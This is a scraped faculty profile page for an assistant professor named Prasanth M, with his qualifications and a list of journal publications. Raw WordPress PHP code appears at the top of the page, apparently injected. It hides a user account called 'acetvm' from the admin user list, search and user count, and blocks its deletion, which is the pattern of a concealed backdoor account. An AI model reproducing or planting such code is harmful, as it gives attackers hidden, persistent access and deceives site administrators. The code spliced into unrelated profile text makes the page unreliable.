add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'acetvm') { wp_die( __('User acetvm tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });

Prasanth M

Name : Prasanth M

Designation: Assistant Professor

Qualification: M.E in Applied Electronics

Experience: 11 years

Mail id: prasanth.m@acetvm.com

Journals

[1] Akhil U, Prasanth M, ”Moving Object Detection and Tracking Using Hybrid Model ” International Research Journal of Advanced Engineering and Science, Volume 1, Issue 3,  2016

[2] Sree Rag R and Prasanth M,- “Conceal message and secure video transmission”, International Research Journal of Advanced Engineering and Science, Volume:1, Issue:3, pp. 28-32, 2016.

[3] Mitna Murali T,Prasanth M: “A Proficient Roi Segmentation with Denoising and Resolution Enhancement”, International Journal of Innovative Research & Development, volume:4, Issue: 06 ,June-2015

[4] Lazeena V P, Prasanth M, ”A Robust Low Power Security System for Multi-Node Communication” International Journal of Emerging Trends in Science and Technology, Volume 2, Issue 6,  2015

 [5] Sumi Mathew, Prasanth M, “Periodic impulsive noise reduction in ofdm based power line communication”, International Journal of Research in Engineering and Technology ,Volume :3, Issue: 05 ,May-2014

[6] Devipriya A, Prasanth M,” ”Smart Association Control in Wireless Fidelity using FBA”, International Journal of ‘Computer Science and Mobile Computing’  Volume:2, Issue:8, , pg.24 – 32 August 2013